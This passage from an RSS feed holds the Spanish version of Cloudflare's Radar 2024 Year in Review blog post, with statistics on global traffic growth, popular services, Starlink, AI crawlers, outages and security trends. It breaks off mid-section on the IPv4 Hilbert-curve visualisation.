            <category><![CDATA[Conformidad]]></category>
            <category><![CDATA[Seguridad]]></category>
            <category><![CDATA[Política y legal]]></category>
            <guid isPermaLink="false">63yGQGTniOUOFneFLwTb7a</guid>
            <dc:creator>Rory Malone</dc:creator>
            <dc:creator>Emily Hancock</dc:creator>
        </item>
        <item>
            <title><![CDATA[Resumen del Año de Cloudflare 2024]]></title>
            <link>https://blog.cloudflare.com/es-es/radar-2024-year-in-review/</link>
            <pubDate>Mon, 09 Dec 2024 14:05:00 GMT</pubDate>
            <description><![CDATA[ El Resumen del Año de Cloudflare Radar 2024 es nuestra quinta revisión anual de las tendencias y patrones de Internet a nivel global y por país/región. ]]></description>
            <content:encoded><![CDATA[ <p>El <a href="https://radar.cloudflare.com/year-in-review/2024">Resumen del Año de Cloudflare Radar 2024</a> es nuestra quinta revisión anual de las tendencias y los patrones de Internet que se observaron durante el año, tanto a nivel global como a nivel nacional/regional, en varias métricas. En la revisión de este año, hemos agregado varias métricas nuevas de tráfico, adopción, conectividad y seguridad del correo electrónico, y la función para hacer comparaciones interanuales y geográficas en ciertas métricas. </p><p>A continuación, presentamos un resumen de las conclusiones clave y luego las analizamos en más detalle en secciones subsiguientes.</p>
    <div>
      <h2>Conclusiones principales</h2>
      <a href="#conclusiones-principales">
        
      </a>
    </div>
    
    <div>
      <h3>Orígenes </h3>
      <a href="#origenes">
        
      </a>
    </div>
    <ul><li><p>El tráfico global de Internet creció un 17,2 % en 2024. <a href="#global-internet-traffic-grew-17-2-in-2024"><u>🔗</u></a></p></li><li><p>Google mantuvo su posición como el servicio de Internet más popular en general. OpenAI se mantuvo en el primer lugar de la categoría de IA generativa. Binance se mantuvo en el primer lugar de la categoría de criptomonedas. WhatsApp siguió siendo la principal plataforma de mensajería, y Facebook siguió siendo el principal sitio de redes sociales. <a href="#google-maintained-its-position-as-the-most-popular-internet-service-openai-binance-whatsapp-and-facebook-led-their-respective-categories"><u>🔗</u></a></p></li><li><p>El tráfico global de Starlink se multiplicó por 3,3 en 2024, de acuerdo con la tasa de crecimiento del año pasado. Después de comenzar a brindar el servicio en Malaui en julio de 2023, el tráfico de Starlink desde ese país se multiplicó por 38 en 2024. Observamos un rápido crecimiento del tráfico en esos lugares a medida que Starlink sumaba nuevos mercados.<a href="#global-traffic-from-starlink-grew-3-3x-in-2024-in-line-with-last-years-growth-rate-after-initiating-service-in-malawi-in-july-2023-starlink-traffic-from-that-country-grew-38x-in-2024"><u>🔗</u></a></p></li><li><p>En 2024, Googlebot, el rastreador web de Google, generó el mayor volumen de tráfico hacia Cloudflare, ya que accedió a millones de sitios de clientes de Cloudflare para indexarlos en su motor de búsqueda.<a href="#google-maintained-its-position-as-the-most-popular-internet-service-openai-binance-whatsapp-and-facebook-led-their-respective-categories"><u>🔗</u></a></p></li><li><p>El tráfico del rastreador de IA de ByteDance (Bytespider) disminuyó gradualmente durante 2024. El rastreador de IA de Anthropic (ClaudeBot) comenzó a mostrar signos de actividad de rastreo en abril, y después de un pico en mayo y junio comenzó a disminuir.<a href="#among-ai-bots-and-crawlers-bytespider-bytedance-traffic-gradually-declined-over-the-course-of-2024-while-claudebot-anthropic-was-more-active-during-the-back-half-of-the-year"><u>🔗</u></a></p></li><li><p>El 13 % del tráfico TLS 1.3 está utilizando encriptación poscuántica. <a href="#13-0-of-tls-1-3-traffic-is-using-post-quantum-encryption"><u>🔗</u></a></p></li></ul>
    <div>
      <h3>Adopción y uso</h3>
      <a href="#adopcion-y-uso">
        
      </a>
    </div>
    <ul><li><p>A nivel mundial, casi un tercio del tráfico de dispositivos móviles fue de Apple iOS. Android tuvo un porcentaje mayor del 90 % del tráfico de dispositivos móviles en 29 países/regiones; el porcentaje pico de tráfico de dispositivos móviles iOS fue de más del 60 %. en ocho países/regiones. <a href="#globally-nearly-one-third-of-mobile-device-traffic-was-from-apple-ios-devices-android-had-a-90-share-of-mobile-device-traffic-in-29-countries-regions-peak-ios-mobile-device-traffic-share-was-over-60-in-eight-countries-regions"><u>🔗</u></a></p></li><li><p>A nivel mundial, casi la mitad de las solicitudes web utilizaron HTTP/2, y el 20,5 % utilizó HTTP/3. El uso de ambas versiones aumentó ligeramente con respecto a 2023. <a href="#globally-nearly-half-of-web-requests-used-http-2-with-20-5-using-http-3"><u>🔗</u></a></p></li><li><p>React, PHP y jQuery fueron algunas de las tecnologías más populares para crear sitios web, mientras que HubSpot, Google y WordPress se destacaron como proveedores líderes de servicios y plataformas de soporte. <a href="#react-php-and-jquery-were-among-the-most-popular-technologies-used-to-build-websites-while-hubspot-google-and-wordpress-were-among-the-most-popular-vendors-of-supporting-services-and-platforms"><u>🔗</u></a></p></li><li><p>Go superó a NodeJS como el lenguaje más popular para llamadas API automatizadas. <a href="#go-surpassed-nodejs-as-the-most-popular-language-used-for-making-automated-api-requests"><u>🔗</u></a></p></li><li><p>Google es, sin duda, el motor de búsqueda más popular del mundo, en todas las plataformas. En cuanto a dispositivos móviles y sistemas operativos, Baidu está muy por detrás en segundo lugar. Bing está muy por detrás en segundo lugar entre los dispositivos de escritorio y de Windows, y DuckDuckGo ocupa el segundo lugar como más popular en macOS. Los porcentajes varían según la plataforma y el país/la región. <a href="#google-is-the-most-popular-search-engine-globally-across-all-platforms-on-mobile-devices-os-baidu-is-a-distant-second-bing-is-a-distant-second-across-desktop-and-windows-devices-with-duckduckgo-second-most-popular-on-macos"><u>🔗</u></a></p></li><li><p>Google Chrome es, sin duda, el navegador más popular en general. Si bien esto también es cierto en los dispositivos macOS, el uso de Safari está muy por delante de Chrome en los dispositivos iOS. En Windows, Edge es el segundo navegador más popular, ya que viene preinstalado y es el navegador predeterminado inicial. <a href="#google-chrome-is-the-most-popular-browser-overall-while-also-true-on-macos-devices-safari-usage-is-well-ahead-of-chrome-on-ios-devices-on-windows-edge-is-the-second-most-popular-browser"><u>🔗</u></a></p></li></ul>
    <div>
      <h3>Conectividad</h3>
      <a href="#conectividad">
        
      </a>
    </div>
    <ul><li><p>Se observaron 225 interrupciones importantes del servicio de Internet en todo el mundo en 2024, y muchas de ellas se debieron a interrupciones a nivel nacional y regional dirigidas por gobiernos. Los cortes de cables y de energía también fueron las principales causas. <a href="#225-major-internet-outages-were-observed-around-the-world-in-2024-with-many-due-to-government-directed-regional-and-national-shutdowns-of-internet-connectivity"><u>🔗</u></a></p></li><li><p>Durante 2024, 28,5 % de las solicitudes con capacidad para IPv6 de todo el mundo se hicieron en IPv6. India y Malasia fueron los países más fuertes, con un 68,9 % y un 59,6 % de adopción de IPv6, respectivamente. <a href="#globally-nearly-half-of-web-requests-used-http-2-with-20-5-using-http-3"><u>🔗</u></a></p></li><li><p>Los 10 principales países clasificados por velocidad de Internet tuvieron velocidades de descarga promedio superiores a 200 Mbps. España estuvo sistemáticamente entre los primeros en cuanto a métricas de calidad de Internet. <a href="#the-top-10-countries-ranked-by-internet-speed-all-had-average-download-speeds-above-200-mbps-spain-was-consistently-among-the-top-locations-across-measured-internet-quality-metrics"><u>🔗</u></a></p></li><li><p>El 41,3 % del tráfico global proviene de dispositivos móviles. En casi 100 países/regiones, la mayor parte del tráfico proviene de dispositivos móviles. <a href="#41-3-of-global-traffic-comes-from-mobile-devices-in-nearly-100-countries-regions-the-majority-of-traffic-comes-from-mobile-devices"><u>🔗</u></a></p></li><li><p>El 20,7 % de las conexiones TCP se interrumpen de manera inesperada antes de que sea posible intercambiar datos útiles. <a href="#20-7-of-tcp-connections-are-unexpectedly-terminated-before-any-useful-data-can-be-exchanged"><u>🔗</u></a></p></li></ul>
    <div>
      <h3>Seguridad</h3>
      <a href="#seguridad">
        
      </a>
    </div>
    <ul><li><p>El 6,5 % del tráfico global fue mitigado por los sistemas de Cloudflare como potencialmente malicioso o por razones definidas por el cliente.En Estados Unidos, el porcentaje de tráfico mitigado creció al 5,1 %, mientras que en Corea del Sur se redujo ligeramente a un 8,1 %. En 44 países/regiones, se mitigó más del 10 % del tráfico. <a href="#6-5-of-global-traffic-was-mitigated-by-cloudflares-systems-as-being-potentially-malicious-or-for-customer-defined-reasons"><u>🔗</u></a></p></li><li><p>Más de un tercio del tráfico global de bots provino de Estados Unidos. El 12,7 % del tráfico global de bots provino de Amazon Web Services, y el 7,8 % de Google. <a href="#the-united-states-was-responsible-for-over-a-third-of-global-bot-traffic-amazon-web-services-was-responsible-for-12-7-of-global-bot-traffic-and-7-8-came-from-google"><u>🔗</u></a></p></li><li><p>A nivel mundial, el sector de apuestas/videojuegos fue el más afectado, un poco por delante del sector financiero, que fue el más afectado en 2023.<a href="#globally-gambling-games-was-the-most-attacked-industry-slightly-ahead-of-2023s-most-targeted-industry-finance"><u>🔗</u></a></p></li><li><p>Log4j, una vulnerabilidad descubierta en 2021, sigue siendo una amenaza constante y fue un objetivo frecuente durante todo 2024. <a href="#log4j-remains-a-persistent-threat-and-was-actively-targeted-throughout-2024"><u>🔗</u></a></p></li><li><p>La seguridad del enrutamiento, medida como porcentaje de rutas válidas RPKI y el porcentaje de espacio de direcciones IP cubierto, siguió mejorando a nivel global durante 2024. En 20024 observamos un aumento del 4,7 % en el espacio de direcciones IPv4 válidas RPKI y un aumento del 6,4 % en las rutas válidas RPKI. <a href="#routing-security-measured-as-the-share-of-rpki-valid-routes-and-the-share-of-covered-ip-address-space-continued-to-improve-globally-throughout-2024"><u>🔗</u></a></p></li></ul>
    <div>
      <h3>Seguridad del correo electrónico</h3>
      <a href="#seguridad-del-correo-electronico">
        
      </a>
    </div>
    <ul><li><p>Se determinó que un promedio del 4,3 % de los correos electrónicos fue malicioso en 2024, aunque probablemente los picos que se observaron en marzo, abril y mayo influyeron en esta cifra. Los enlaces engañosos y el fraude de identidad fueron los dos tipos más comunes de amenazas que se encontraron en los mensajes de correo electrónico maliciosos. <a href="#an-average-of-4-3-of-emails-were-determined-to-be-malicious-in-2024"><u>🔗</u></a></p></li><li><p>Más del 99 % de los correos electrónicos procesados por Cloudflare Email Security de los dominios de nivel superior (TLD) .bar, .rest, y .uno resultaron ser spam o maliciosos.<a href="#over-99-of-the-email-messages-processed-by-cloudflare-email-security-from-the-bar-rest-and-uno-top-level-domains-tlds-were-found-to-be-either-spam-or-malicious-in-nature"><u>🔗</u></a></p></li></ul>
    <div>
      <h2>Introducción</h2>
      <a href="#introduccion">
        
      </a>
    </div>
    <p>En los últimos cuatro años<a href="https://blog.cloudflare.com/cloudflare-radar-2020-year-in-review/"><u> (2020,</u></a><a href="https://blog.cloudflare.com/cloudflare-radar-2021-year-in-review/"></a>2021, <a href="https://blog.cloudflare.com/radar-2022-year-in-review/"><u>2022,</u></a><a href="https://blog.cloudflare.com/radar-2023-year-in-review/"><u>2023),</u></a> hemos agregado información de <a href="https://radar.cloudflare.com/"><u>Cloudflare Radar</u></a> en un Resumen del Año que muestra los patrones de Internet en varias áreas durante ese año. El <a href="https://radar.cloudflare.com/year-in-review/2024"><u>micrositio del Resumen del Año de Cloudflare Radar 2024</u></a> continúa esa tradición, con tablas, gráficos y mapas interactivos que puedes utilizar para analizar y comparar las tendencias de Internet más destacadas que se observaron durante este año que termina.</p><p>La <a href="https://www.cloudflare.com/network"><u>red</u></a> de Cloudflare actualmente abarca más de 330 ciudades en más de 120 países/regiones, procesa un promedio que supera las 63 millones de solicitudes HTTP(S) por segundo para millones de propiedades de Internet, y gestiona un promedio que supera las 42 millones de solicitudes DNS por segundo. Los datos que se generan con este uso, combinados con los datos de otras herramientas complementarias de Cloudflare, permiten que Radar brinde información exclusiva casi en tiempo real sobre los patrones y las tendencias de la seguridad, el tráfico, el rendimiento y el uso que observamos en Internet. </p><p>El Resumen del Año 2024 está organizado en cinco secciones: <a href="https://radar.cloudflare.com/year-in-review/2024#traffic"><u>Tráfico</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2024#adoption-and-usage"><u>Adopción y uso</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2024#connectivity"><u>Conectividad</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2024#security"><u>Seguridad</u></a> y<a href="https://radar.cloudflare.com/year-in-review/2024#email-security"><u> Seguridad del correo electrónico</u></a>, y abarca el periodo comprendido entre el 1 de enero y el 1 de diciembre de 2024. Este año hemos agregado varias métricas nuevas, como el tráfico de bots y rastreadores de IA, la cuota de mercado de motores de búsqueda y navegadores, la manipulación de conexiones y los dominios de nivel superior (TLD) "más peligrosos".Para garantizar la uniformidad, hemos mantenido la coherencia de las metodologías subyacentes con los cálculos de años anteriores. Puedes consultar las tendencias de 200 países/regiones en el micrositio; los lugares más pequeños o menos poblados no se incluyen debido a la falta de datos. Algunas métricas solo se muestran a nivel global, y no se muestran si se selecciona un país/región. </p><p>A continuación, ofrecemos un resumen del contenido de las principales secciones del Resumen Anual (Tráfico, Adopción y uso, Conectividad, Seguridad y Seguridad del correo electrónico), junto con observaciones destacadas y conclusiones clave. Además, también hemos publicado una entrada complementaria en el blog que analiza específicamente las tendencias que se obseraron en los <a href="https://blog.cloudflare.com/radar-2024-year-in-review-internet-services/"><u>principales servicios de</u></a> Internet .</p><p>Las principales conclusiones y el análisis en esta publicación solo ofrecen una perspectiva de alto nivel sobre la información exclusiva que se encuentra en el <a href="https://radar.cloudflare.com/year-in-review/2024"><u>micrositio del Resumen del Año</u></a>. Visita el micrositio y explora los distintos conjuntos de datos y las métricas en más detalle, como las tendencias que se observaron en tu país/región, las formas en que han cambiado estas tendencias con respecto a 2023 y la comparación con otros países/regiones de interés. Un análisis de Internet desde este punto de vista brinda información para que puedas tomar decisiones informadas sobre todo, desde el estado de seguridad y las prioridades informáticas de una organización hasta el desarrollo y la estrategia de productos. </p>
    <div>
      <h2>Tendencias del tráfico</h2>
      <a href="#tendencias-del-trafico">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4XlL4SnJROa2fArrtUheuo/822ede9708eb6e9aeeebce4331d62140/2627_Graph.png" />
          </figure>
    <div>
      <h3>El tráfico global de Internet creció un 17,2 % en 2024.</h3>
      <a href="#el-trafico-global-de-internet-crecio-un-17-2-en-2024">
        
      </a>
    </div>
    <p>Podríamos decir que un punto de inflexión para el tráfico de Internet se produjo hace treinta años. La World Wide Web se generalizó en 1994, con el<a href="https://cybercultural.com/p/1993-mosaic-launches-and-the-web-is-set-free/"><u> lanzamiento</u></a>, a fines de 1993, del <a href="https://www.ncsa.illinois.edu/research/project-highlights/ncsa-mosaic/"><u>navegador NCSA Mosaic</u></a> para varios sistemas operativos populares, que admitían imágenes incrustadas.A su vez, el contenido de Internet "más pesado" (en contraste con el contenido de texto) se convirtió en la norma, y junto con el aumento del consumo de servicios en línea y la industria emergente de los proveedores de servicios de Internet (ISP), <a href="https://blogs.cisco.com/sp/the-history-and-future-of-internet-traffic"><u>el tráfico de Internet comenzó a crecer rápidamente</u></a>, y esa tendencia ha continuado. hasta el presente.</p><p>Para determinar las tendencias del tráfico a lo largo del tiempo para el Resumen del Año, utilizamos el volumen de tráfico diario promedio (sin incluir el tráfico de bots) como referencia durante la segunda semana completa (del 8 al 15 de enero) de 2024. (Se toma como referencia la segunda semana para dar tiempo a que las personas vuelvan a sus rutinas escolares y laborales "habituales" después de las vacaciones de invierno y el día de Año Nuevo. El cambio porcentual que se muestra en el gráfico de tendencias de tráfico se calcula teniendo en cuenta el valor de referencia, no representa el volumen de tráfico absoluto de un país o región. La línea de tendencia representa un promedio de seguimiento de siete días que se utiliza para mitigar los cambios bruscos que se observan con los datos diarios en detalle. Para comparar las tendencias de tráfico de 2024 con los datos de 2023 y/u otras ubicaciones, haz clic en el icono "Comparar" en la parte superior derecha del gráfico.</p><p>Durante la primera mitad de 2024, el<a href="https://radar.cloudflare.com/year-in-review/2024?#internet-traffic-growth"><u> crecimiento del tráfico de Internet en todo el mundo</u></a> pareció ser bastante limitado, a uno o dos puntos porcentuales a ambos lados del valor de referencia hasta mediados de agosto. Sin embargo, en ese momento el crecimiento empezó a acelerarse claramente, y aumentó de manera constante hasta fines de noviembre, con un crecimiento del 17,2 % en el año. Esta tendencia es similar a las que se observaron en 2023 y 2022, como comentamos en la <a href="https://blog.cloudflare.com/radar-2023-year-in-review/"><u>publicación del blog Resumen del Año 2023</u></a>.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5NjOCs902pW74OQ0bx2usy/58896c0bc06b4a9c819736bde28ed3f4/traffic_-_worldwide.png" />
          </figure><p><i><sup>Tendencias del tráfico de Internet en todo el mundo en 2024</sup></i></p><p><a href="https://radar.cloudflare.com/year-in-review/2024/gn?previousYear=true"><u>Guinea,</u></a> en África Occidental, tuvo el crecimiento de tráfico de Internet más significativo en 2024, un 350 % por encima del valor de referencia. El crecimiento del tráfico no comenzó con fuerza hasta fines de febrero, y alcanzó un pico inicial a principios de abril. Se mantuvo entre un 100 % y un 200 % por encima del valor de referencia hasta septiembre, momento en que experimentó varios periodos de crecimiento de varias semanas. Si bien los periodos de crecimiento de tráfico de septiembre a noviembre también se produjeron en 2023, llegaron a un pico inferior al 90 % por encima del valor de referencia.</p><p>El impacto de las importantes interrupciones de Internet también es claramente visible cuando se observan los datos durante el año. Se observaron claramente dos importantes interrupciones de Internet en <a href="https://radar.cloudflare.com/year-in-review/2024/cu#internet-traffic-growth"><u>Cuba</u></a> como factores determinantes de las considerables caídas del tráfico en octubre y noviembre. El <a href="https://x.com/CloudflareRadar/status/1847325224208891950"><u>18 de octubre</u></a> hubo una "desconexión total" del sistema eléctrico nacional en la isla, <a href="https://x.com/CloudflareRadar/status/1848680148813406474"><u>que duró</u></a> un poco más de tres días. Solo un par de semanas después, el 6 de noviembre, los <a href="https://x.com/CloudflareRadar/status/1854291286322544752"><u>daños ocasionados por el huracán Rafael causaron cortes de energía generalizados en Cuba</u></a>, lo que provocó otra gran caída en el tráfico de Internet. El tráfico se ha mantenido bajo debido a las <a href="https://x.com/CloudflareRadar/status/1864263679442567604"><u>dificultades de la infraestructura eléctrica de Cuba .</u></a></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2rvK8AFYdcJAgQhJQUTiQw/8c4790fd06af8323636878977a9d712c/traffic_-_Cuba.png" />
          </figure><p><i><sup>Tendencias del tráfico de Internet en 2024, Cuba</sup></i></p><p>Como comentamos con frecuencia en el blog de Cloudflare Radar y en las publicaciones de las redes sociales, los cortes de Internet ordenados por los gobiernos se producen con demasiada frecuencia, y el impacto de estas medidas también es claramente visible cuando se analizan los datos de tráfico en el largo plazo. En <a href="https://radar.cloudflare.com/year-in-review/2024/bd#internet-traffic-growth"><u>Bangladés</u></a>, el gobierno ordenó un <a href="https://blog.cloudflare.com/q3-2024-internet-disruption-summary/#bangladesh"><u>corte de la conectividad a Internet móvil</u></a> el 18 de julio, en respuesta a las protestas estudiantiles. Poco después del corte de las redes móviles, también hubo una desconexión de las redes de banda ancha fija, lo que generó una pérdida casi total del tráfico de Internet del país. La conectividad se recuperó gradualmente en unos días, entre el 23 y el 28 de julio.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5FvubyG6qMeZ9hv1wgFayl/91d356b23788a8f9cdd970cc7e65f8fc/traffic_-_Bangladesh.png" />
          </figure><p><i><sup>Tendencias del tráfico de Internet en 2024, Bangladés</sup></i></p><p>Como también observamos el año pasado, la celebración de las principales festividades también puede tener un impacto visible en el tráfico de Internet a nivel país. Por ejemplo, en países musulmanes como <a href="https://radar.cloudflare.com/year-in-review/2024/ae?compareWith=ID#internet-traffic-growth"><u>Indonesia y los Emiratos Árabes Unidos</u></a>, durante la celebración de Eid al-Fitr, la festividad que marca el fin del ayuno del Ramadán, se observa una notable disminución del tráfico aproximadamente entre el 9 y el 10 de abril. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/aFTFP2banlfW65XkjUIZM/84bfd5db1036da1b4740843575217113/traffic_-_UAE_Indonesia.png" />
          </figure><p><i><sup>Tendencias del tráfico de Internet en 2024, Indonesia y Emiratos Árabes Unidos</sup></i></p>
    <div>
      <h3>Google mantuvo su posición como el servicio de Internet más popular. OpenAI, Binance, WhatsApp y Facebook lideraron sus respectivas categorías. </h3>
      <a href="#google-mantuvo-su-posicion-como-el-servicio-de-internet-mas-popular-openai-binance-whatsapp-y-facebook-lideraron-sus-respectivas-categorias">
        
      </a>
    </div>
    <p>En los últimos años, el Resumen del Año ha clasificado los <a href="https://radar.cloudflare.com/year-in-review/2024#internet-services"><u>servicios de Internet más populares</u></a>. Estas clasificaciones ofrecen una perspectiva "general" y una docena de categorías más específicas, en función de análisis de datos de consultas anonimizadas de tráfico a nuestro <a href="https://1.1.1.1/dns"><u>solucionador de DNS público 1.1.1.1</u></a> de millones de usuarios de todo el mundo. Para estas clasificaciones, se agrupan los dominios que pertenecen a un único servicio de Internet.</p><p>Google volvió a ocupar el primer puesto, debido a su amplia cartera de servicios y a la popularidad del sistema operativo móvil Android (más información sobre el tema <a href="#globally-nearly-one-third-of-mobile-device-traffic-was-from-apple-ios-devices-android-had-a-90-share-of-mobile-device-traffic-in-29-countries-regions-peak-ios-mobile-device-traffic-share-was-over-60-in-eight-countries-regions"><u>a continuación</u></a>). Las plataformas de propiedad de Meta, Facebook, Instagram y WhatsApp también ocuparon los primeros 10 puestos.</p><p>La popularidad de la <a href="https://www.cloudflare.com/learning/ai/what-is-generative-ai/"><u>IA generativa</u></a> siguió creciendo durante 2024, y en esta categoría, OpenAI volvió a ocupar el primer puesto, debido al éxito y a la popularidad que siguió teniendo ChatGPT. En las redes sociales, los cinco primeros puestos se mantuvieron con respecto a la clasificación de 2023 y 2022, con Facebook, TikTok, Instagram, X y Snapchat.</p><p>Estas clasificaciones en categorías, y las tendencias observadas por servicios específicos, se analizan en más detalle en otra publicación del blog, <a href="https://blog.cloudflare.com/radar-2024-year-in-review-internet-services/"><i><u>Desde ChatGPT hasta Temu: clasificación de los principales servicios de Internet de 2024</u></i></a>.</p>
    <div>
      <h3>El tráfico global de Starlink se multiplicó por 3,3 en 2024, de acuerdo con la tasa de crecimiento del año pasado. Después de comenzar a brindar el servicio en Malaui en julio de 2023, el tráfico de Starlink desde ese país se multiplicó por 38 en 2024. </h3>
      <a href="#el-trafico-global-de-starlink-se-multiplico-por-3-3-en-2024-de-acuerdo-con-la-tasa-de-crecimiento-del-ano-pasado-despues-de-comenzar-a-brindar-el-servicio-en-malaui-en-julio-de-2023-el-trafico-de-starlink-desde-ese-pais-se-multiplico-por-38-en-2024">
        
      </a>
    </div>
    <p>Starlink, de SpaceX, sigue siendo el principal proveedor de acceso a Internet satelital, que ofrece conectividad a zonas sin servicios o con servicios insuficientes. Además de abrir nuevos mercados en 2024, Starlink también anunció acuerdos para brindar conectividad a bordo de <a href="https://www.cnbc.com/2024/09/17/spacexs-starlink-has-2500-aircraft-under-contract.html"><u>varias aerolíneas</u></a>, en <a href="https://x.com/Starlink/status/1790426484022342081"><u>cruceros</u></a> y en <a href="https://x.com/Starlink/status/1857166233969607123"><u>trenes</u></a>, y también para que los suscriptores puedan tener servicio de roaming con su suscripción utilizando <a href="https://www.theverge.com/2024/7/11/24196294/starlink-mini-available-us-price-specs"><u>Starlink Mini</u></a>.</p><p>Analizamos los volúmenes de tráfico conjunto de Cloudflare relacionados con el <a href="https://www.cloudflare.com/learning/network-layer/what-is-an-autonomous-system/"><u>sistema autónomo principal</u></a> de Starlink (<a href="https://radar.cloudflare.com/as14593"><u>AS14593</u></a>) para seguir el crecimiento del uso del servicio durante 2024. Al igual que las tendencias de tráfico analizadas anteriormente, el volumen de solicitudes que se muestra en la línea de tendencia del gráfico representa un promedio de los últimos siete días. Para comparar con los datos de 2023, haz clic en el icono "Comparar" en la parte superior derecha del gráfico. En las vistas comparativas, las líneas se escalan al valor máximo mostrado.</p><p>A <a href="https://radar.cloudflare.com/year-in-review/2024#starlink-traffic.trends"><u>nivel mundial</u></a>, se observó un crecimiento uniforme y constante durante el año, con una aceleración en noviembre. Esta aceleración probablemente se deba al tráfico relacionado con importantes actualizaciones de software específicas de los clientes. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6Dy2qt4O5b3MCswkckhELA/aa29c7235497bed8c985aa9dd9b63477/traffic_-_Starlink_worldwide.png" />
          </figure><p><i><sup>Crecimiento del tráfico de Starlink en el mundo en 2024</sup></i></p><p>En muchos lugares, existe una demanda acumulada de proveedores de conectividad "alternativos" como Starlink, y en estos países/regiones, observamos un rápido crecimiento del tráfico cuando el servicio está disponible, como en <a href="https://radar.cloudflare.com/year-in-review/2024/zw#starlink-traffic.trends"><u>Zimbabue</u></a>. La disponibilidad del servicio se <a href="https://x.com/Starlink/status/1832392080481563037"><u>anunció el 7 de septiembre</u></a>, y el tráfico en el país comenzó a crecer rápidamente casi de inmediato después del anuncio.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1aLywcrB5w88flsDyK1R1q/1039d989e19dc566cf5f62e60f3f1886/traffic_-_Starlink_Zimbabwe.png" />
          </figure><p><i><sup>Crecimiento del tráfico de Starlink en Zimbabue en 2024</sup></i></p><p>En los nuevos mercados, el crecimiento del tráfico continúa después de ese aumento inicial. Por ejemplo, el servicio de Starlink comenzó a estar disponible en Malawi <a href="https://x.com/Starlink/status/1683897037639790592"><u>en julio de 2023</u></a> y durante 2024 el tráfico de Starlink procedente de este país se multiplicó por 38. Si bien el <a href="https://radar.cloudflare.com/year-in-review/2024/mw#starlink-traffic.trends"><u>aumento de 38 veces en Malawi</u></a> es impresionante, otros países también tuvieron un crecimiento significativo. En <a href="https://radar.cloudflare.com/year-in-review/2024/ge#starlink-traffic.trends"><u>Georgia</u></a>, un país de Europa del Este, <a href="https://x.com/Starlink/status/1719581885200998485"><u>el servicio comenzó a estar disponible el 1 de noviembre de 2023</u></a>. Tras un ascenso lento, el tráfico empezó a crecer y se multiplicó por 100 durante 2024. En <a href="https://radar.cloudflare.com/year-in-review/2024/py#starlink-traffic.trends"><u>Paraguay,</u></a><a href="https://x.com/Starlink/status/1737914318522581489"><u>se anunció la disponibilidad del servicio el 21 de diciembre</u></a>, comenzó a crecer a principios de enero, y registró un aumento que se multiplicó por más de 900 durante el año.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6AXOON7CO7XgnWSNnezoiF/bd56192d682c574a2d242845bb0eda16/traffic_-_Starlink_Malawi.png" />
          </figure><p><i><sup>Crecimiento del tráfico de Starlink en Malawi en 2024</sup></i></p>
    <div>
      <h3>En 2024, Googlebot generó el mayor volumen de tráfico hacia Cloudflare, ya que accedió a millones de sitios de clientes de Cloudflare para indexarlos en su motor de búsqueda. </h3>
      <a href="#en-2024-googlebot-genero-el-mayor-volumen-de-trafico-hacia-cloudflare-ya-que-accedio-a-millones-de-sitios-de-clientes-de-cloudflare-para-indexarlos-en-su-motor-de-busqueda">
        
      </a>
    </div>
    <p>Cloudflare Radar muestra a los usuarios las tendencias del tráfico de Internet durante un periodo de tiempo seleccionado, pero a nivel de país/región o red. Sin embargo, <a href="https://blog.cloudflare.com/radar-2023-year-in-review/#googlebot-was-responsible-for-the-highest-volume-of-request-traffic-to-cloudflare-in-2023"><u>como hicimos en 2023</u></a>, queríamos analizar nuevamente el tráfico que observó Cloudflare durante todo el año procedente de todo Internet versión IPv4. Para ello, podemos utilizar las <a href="https://en.wikipedia.org/wiki/Hilbert_curve"><u>curvas de Hilbert</u></a>, que nos permiten visualizar una secuencia de direcciones IPv4 en un patrón bidimensional que mantiene las direcciones IP cercanas unas de otras, lo que permite que sean <a href="https://xkcd.com/195/"><u>útiles</u></a> para estudiar el espacio de direcciones IPv4 de Internet.</p><p>Con una curva de Hilbert, podemos <a href="https://radar.cloudflare.com/year-in-review/2024#ipv4-traffic-distribution"><u>visualizar el tráfico agregado de solicitudes IPv4 para Cloudflare</u></a> desde el 1 de enero hasta el 1 de diciembre de 2024. En la visualización, agregamos las direcciones IPv4 a un nivel de <a href="https://www.ripe.net/about-us/press-centre/IPv4CIDRChart_2015.pdf"><u>/20</u></a>, lo que significa que en el nivel de ampliación más alto, cada cuadrado representa el tráfico de 4096 direcciones IPv4. Este agregado se hace para que la cantidad de datos utilizados para la visualización sea manejable. (Si bien quisiéramos crear una visualización similar para el tráfico IPv6, la enormidad del espacio de direcciones IPv6 haría que el tráfico relacionado fuera muy <a href="https://observablehq.com/@vasturiano/hilbert-map-of-ipv6-address-space"><u>difícil de ver</u></a> en dicha visualización, especialmente porque Regional Internet Registries <a href="https://www.iana.org/numbers/allocations/"><u>ha destinado una cantidad tan pequeña para la asignación</u></a>).</p><p>En la visualización, las direcciones IP están agrupadas por propiedad, y para mucho del espacio de dirección IP que se muestra aquí, al pasar el mouse sobre el nivel de apertura de plano predeterminado se mostrará el <a href="https://www.nro.net/about/rirs/"><u>Registro de Internet Regional (RIR)</u></a> al que pertenece el bloque de dirección. Sin embargo, también hay una cantidad de bloques que fueron asignados antes de la existencia del sistema RIR, y estos están etiquetados con el nombre de la organización a la que pertenecen. Una apertura de plano progresiva muestra el sistema autónomo y el país/la región al que está asociado el bloque de dirección IP, y también el porcentaje de tráfico relativo al máximo. (Si se selecciona un país/una región, solo los bloques de dirección IP asociados con ese lugar son visibles). En general, los porcentajes de tráfico están indicados por un sombreado en función de una escala de color, y si bien una cantidad de bloques grandes sin sombrear son visibles, esto no significa necesariamente que el espacio de dirección asociado está sin utilizar, sino que se puede utilizar de una manera que no genera tráfico hacia Cloudflare.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6gtrL1H2gUjSKH7AMSabgM/361d38f34860258449a914e26519a4b4/traffic_-_Hilbert_curve.png" />
